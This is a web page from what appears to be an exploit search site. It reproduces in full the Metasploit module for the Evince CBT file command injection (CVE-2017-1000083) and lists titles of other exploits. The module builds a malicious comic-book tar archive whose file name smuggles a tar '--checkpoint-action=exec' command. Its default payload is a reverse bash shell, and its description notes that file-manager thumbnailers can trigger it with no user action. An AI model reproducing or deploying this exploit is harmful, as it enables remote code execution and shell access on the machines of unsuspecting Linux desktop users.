Menu

Improved exploit search engine. Try python and hit enter

"Evince - CBT File Command Injection (Metasploit)"

Author

Metasploit

Platform

linux

Release date

2019-02-11

Release Date Title Type Platform Author
2019-03-11 "Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak" dos linux wally0813
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-06 "Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem" dos linux "Google Security Research"
2019-03-04 "FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)" dos linux "Mr Winst0n"
2019-03-01 "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module" dos linux "Google Security Research"
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-02-22 "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation" webapps linux SecureAuth
2019-02-20 "MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates" dos linux "Google Security Research"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-13 "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)" local linux embargo
2019-02-15 "Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference" dos linux "Google Security Research"
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-11 "CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting" webapps linux DKM
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)" local linux "Chris Moberly"
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)" local linux "Chris Moberly"
2019-02-12 "runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution" local linux feexd
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2018-10-20 "LibSSH 0.7.6 / 0.8.4 - Unauthorized Access" remote linux jas502n
2019-01-29 "MiniUPnPd 2.1 - Out-of-Bounds Read" dos linux b1ack0wl
2019-01-23 "Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation" webapps linux "Chris Lyne"
2019-01-24 "Ghostscript 9.26 - Pseudo-Operator Remote Code Execution" remote linux "Google Security Research"
2019-01-28 "MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation" local linux d7x
2019-01-24 "AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-21 "GattLib 0.2 - Stack Buffer Overflow" remote linux "Dhiraj Mishra"
2019-01-16 "blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-21 "Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer" dos linux wally0813
2019-01-16 "NTPsec 1.1.2 - 'config' Authenticated Out-of-Bounds Write Denial of Service (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ntp_control' Authenticated NULL Pointer Dereference (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ntp_control' Out-of-Bounds Read (PoC)" dos linux "Magnus Klaaborg Stubman"
Release Date Title Type Platform Author
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2019-01-24 "AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-16 "blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Services API (Metasploit)" remote linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)" remote linux Metasploit
2018-12-20 "Erlang - Port Mapper Daemon Cookie RCE (Metasploit)" remote multiple Metasploit
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-12-13 "CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)" local windows Metasploit
2018-12-04 "HP Intelligent Management - Java Deserialization RCE (Metasploit)" remote windows Metasploit
2018-12-04 "Emacs - movemail Privilege Escalation (Metasploit)" local unix Metasploit
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-29 "TeamCity Agent - XML-RPC Command Execution (Metasploit)" remote multiple Metasploit
2018-11-29 "PHP imap_open - Remote Code Execution (Metasploit)" remote linux Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-29 "Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)" local linux Metasploit
2018-11-29 "Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)" local linux Metasploit
2018-11-27 "Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)" remote hardware Metasploit
2018-11-26 "Xorg X11 Server - SUID privilege escalation (Metasploit)" local multiple Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2018-11-06 "blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)" remote php Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46341/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Evince CBT File Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in Evince
        before version 3.24.1 when opening comic book `.cbt` files.

        Some file manager software, such as Nautilus and Atril, may allow
        automatic exploitation without user interaction due to thumbnailer
        preview functionality.

        Note that limited space is available for the payload (<256 bytes).
        Reverse Bash and Reverse Netcat payloads should be sufficiently small.

        This module has been tested successfully on evince versions:

        3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
        3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Felix Wilhelm',     # Discovery
          'Sebastian Krahmer', # PoC
          'Matlink',           # Exploit
          'bcoles'             # Metasploit
        ],
      'References'     =>
        [
          ['BID', '99597'],
          ['CVE', '2017-1000083'],
          ['EDB', '45824'],
          ['URL', 'https://seclists.org/oss-sec/2017/q3/128'],
          ['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'],
          ['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'],
          ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'],
          ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'],
          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083']
        ],
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 215,
          'BadChars'    => "\x00\x0a\x0d\x22",
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_bash',
          'DisablePayloadHandler' => true
        },
      'Targets'        => [[ 'Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '2017-07-13',
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt'])
    ])
  end

  def exploit
    ext = %w[png jpg gif]
    path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}"

    # Tar archive max path length is 256.
    if path.length > 256
      fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
    end

    # Tar archive max file name length is 100.
    path.split('/').each do |fname|
      if fname.length > 100
        fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
      end
    end

    # Create malicious tar archive
    tarfile = StringIO.new
    Rex::Tar::Writer.new tarfile do |tar|
      tar.add_file path, 0644 do |io|
        io.write ''
      end
      # Pad file to 1+ MB to trigger tar checkpoint action
      tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
        io.write rand_text(1_000_000..1_100_000)
      end
    end
    tarfile.rewind
    cbt = tarfile.read

    print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
    file_create cbt
  end
end